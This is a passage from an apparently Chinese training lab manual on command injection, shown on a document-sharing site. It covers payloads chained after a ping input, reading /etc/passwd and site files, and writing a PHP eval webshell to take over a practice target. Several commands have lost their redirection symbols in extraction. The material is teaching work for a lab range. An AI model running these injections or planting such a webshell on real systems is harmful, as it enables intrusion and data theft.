信息安全技术与应用 实训指导手册 (高学勤) 实训项目5:命令执行漏洞分析及利用.docx

信息安全技术与应用 实训指导手册 (高学勤) 实训项目5:命令执行漏洞分析及利用.docx

  1. 1、本文档共21页,可阅读全部内容。
  2. 2、原创力文档(book118)网站文档一经付费(服务费),不意味着购买了该文档的版权,仅供个人/单位学习、研究之用,不得用于商业用途,未经授权,严禁复制、发行、汇编、翻译或者网络传播等,侵权必究。
  3. 3、本站所有内容均由合作方或网友上传,本站不对文档的完整性、权威性及其观点立场正确性做任何保证或承诺!文档内容仅供研究参考,付费前请自行鉴别。如您付费,意味着您自己接受本站规则且自行承担风险,本站不退款、不进行额外附加服务;查看《如何避免下载的几个坑》。如果您已付费下载过本站文档,您可以点击 这里二次下载
  4. 4、如文档侵犯商业秘密、侵犯著作权、侵犯人身权等,请点击“版权申诉”(推荐),也可以打举报电话:400-050-0827(电话支持时间:9:00-18:30)。
查看更多
信息安全技术与应用实训指导手册(高学勤)

寻真求是 格物致知 信息安全发展态势与知识拓展 实训项目指导手册 V1.0 PAGE PAGE 4 / NUMPAGES 72 目录TOC \o 1-2 \h \u 23710 命令执行漏洞分析及利用 2 7553 概述 2 10527 实验环境 2 21218 前提条件 2 2424 实验流程 2 15621 实验目标 2 928 任务1 利用命令执行漏洞获取系统敏感信息 3 5759 任务2 利用漏洞获取网站控制权限 10 19073 任务3 命令执行漏洞防护 13 命令执行漏洞分析及利用 概述 当应用需要调用一些外部程序去处理内容的情况下,就会用到一些执行系统命令的函数。如PHP中的system(),exec(),shell_exec()等,当用户可以控制命令执行函数中的参数时,将可注入恶意系统命令到正常命令中,造成命令执行攻击。 本实验使用的靶场环境为:命令执行渗透靶场。 实验环境 攻击机:Windows Server 2016(01-Windows攻击机),IP:30 靶机:CentOS 64位(02-Linux靶机),IP:72 前提条件 本实验要求: 熟悉Windows基本操作 熟悉Linux常用命令 实验流程 实验目标 完成本实验后,您将能够: 掌握命令执行漏洞基本利用方法 掌握利用命令执行漏洞获取Webshell的方法 掌握命令执行漏洞的代码级防护方法 任务1 利用命令执行漏洞获取系统敏感信息 【任务目标】 构造命令执行语句,触发命令执行漏洞,并通过命令执行漏洞获取系统敏感信息。 【前提准备】 命令连接符: command1 command2 :不管command1执行成功与否,都会执行command2(将上一个命令的输出作为下一个命令的输入); command1 command2 :先执行command1执行成功后才会执行command2; command1 | command2 :只执行command2; command1 || command2 :command1执行失败,再执行command2(若command1执行成功,就不再执行command2); command 1 ; command2:只在Linux里适用,command1和command2独立执行,不管command1执行成功没有,command2继续执行。 【任务步骤】 靶场环境准备 启动靶机,并查看靶机IP。(系统登录账号密码:root/root) 执行如下命令,查看靶场是否正常启动。(默认开机自动启动) docker ps //查看当前容器是否正常运行 攻击机访问靶机站点 在攻击机打开浏览器访问http://靶机IP:85/start/ 执行攻击测试 构造拼接语句: || whoami //该命令含义为:执行ping ,若ping执行失败,则执行whoami。 页面回显当前用户名称:nginx,说明whoami命令成功执行。 判断操作系统类型 通过查看IP的命令判断操作系统类型(Windows为:ipconfig,Linux为:ifconfig)。 构造拼接语句: || ipconfig 页面无回显,说明ipconfig执行失败。 构造拼接语句: || ifconfig 页面有回显,说明ifconfig执行成功,判断为Linux操作系统。 注:判断是否为Linux操作系统,有很多方法,根据Linux操作系统特性进行判断即可。 获取操作系统敏感信息 构造拼接语句: || pwd //查看网站路径 构造拼接语句: || ls //查看当前路径下的文件 构造拼接语句: || ls -l //查看文件权限 构造拼接语句: || cat lookme.php //查看指定文件内容 可以看到,命令执行成功,但因为是PHP文件内容,所以内容被解析,无法正常显示。可构造如下命令,将lookme.php中的内容保存至1.txt中。 构造拼接语句: || cat lookme.php 1.txt 查看1.txt文件是否生成。 在URL中访问1.txt文件内容。 通过上述方法,可查看各类文件内容。 同时,也可查看其它目录下的文件及内容,如: 构造拼接语句: || ls ../ //查看上一级目录 查看/etc/passwd文件内容。 任务2 利用漏洞获取网站控制权限 【任务目标】 通过命令执行漏洞,写入一句话木马到网站中,从而获得Webshell。 【任务步骤】 构造如下拼接语句: || echo ?php @eval($_POST[pass]);? muma.php 查看是否成功写入。 访问muma.php文件。 复制muma.p

您可能关注的文档

文档评论(0)

lai + 关注
实名认证
内容提供者

精品资料

版权声明书
用户编号:7040145050000060

1亿VIP精品文档

相关文档